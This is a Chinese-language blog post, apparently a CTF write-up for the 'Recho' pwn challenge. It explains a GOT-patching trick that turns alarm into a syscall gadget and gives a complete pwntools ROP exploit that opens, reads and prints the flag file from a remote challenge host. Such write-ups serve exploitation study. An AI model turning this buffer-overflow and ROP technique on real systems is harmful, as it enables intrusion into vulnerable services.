最近感觉事情比较忙 以前就是做了一些题 就总结一下 现在 是 如果题目一下就看出来了 就再也不会写博客了
估计以后博客会 越写越少
然后 这个题目 参考链接
https://www.xctf.org.cn/library/details/e0d90ad9d0609320fd6743706135a80913d27b8d/
主程序
主要是有几点没有想到
第一点就是没有想到怎么退出循环 这个是一直等待着输入的东西
然后 看了一下题解 知道了 还有 shutdown
然后第二地方就是 没有想到的是 syscall
这个东西以前看过但是确实没有想起来这个思路
直接 用 sysacll 的调用库 然后直接 调用函数
open flag 文件 然后read write 就可以了
这里的 syscall 我们就可以直接 通过偏移的出来了
可以看的出来 只要把got 表地址加5 就可以的 ok 了
那么 寻找一波 Rop
看见了 add byte ptr [rdi], al ; ret 可以通过这个指令 拿出来 搞定got地址
不过 fd 的值 要搞清楚 linux 的open 返回值是可以算出来的
这里是docker 镜像 所以直接是 3
那么 下面是脚本
#coding:utf-8
from pwn import *
context.log_level = 'debug'
#io = process('./Recho')
io = remote('111.198.29.45', 53796)
elf = ELF('./Recho')
pop_rax=0x00000000004006fc
pop_rdi=0x00000000004008a3
pop_rdx=0x00000000004006fe
rsi_r15_ret = 0x4008a1
add_rdi_al=0x000000000040070d
flag_addr=0x601058
alarm_got = elf.got['alarm']
read_plt = elf.plt['read']
write_plt = elf.plt['write']
alarm_plt = elf.plt['alarm']
free_addr=0x601090
#rdi,rsi,rdx,r10,r9,r8
#fd=open("flag")
#read(fd, bss_addr, 100)
#write(1, bss_addr, 100)
if __name__ =="__main__":
payload=""
payload+='a'*0x38
payload+=p64(pop_rax)+p64(0x5)
payload+=p64(pop_rdi)+p64(alarm_got)
payload+=p64(add_rdi_al)
payload+=p64(pop_rax)+p64(0x2)
payload+=p64(pop_rdi)+p64(flag_addr)
payload+=p64(pop_rdx)+p64(0)
payload+=p64(rsi_r15_ret)+p64(0)*2
payload+=p64(alarm_plt)
payload+=p64(pop_rdi)+p64(0x3)
payload+=p64(rsi_r15_ret)+p64(free_addr)+p64(0)
payload+=p64(pop_rdx)+p64(0x30)
payload+=p64(read_plt)
payload+=p64(pop_rdi)+p64(0x1)
payload+=p64(rsi_r15_ret)+p64(free_addr)+p64(0)
payload+=p64(pop_rdx)+p64(0x30)
payload+=p64(write_plt)
io.sendline(str(0x200))
io.sendline(payload.ljust(0x200, '\x00'))
io.recv()
io.shutdown("send")
io.interactive()
io.close()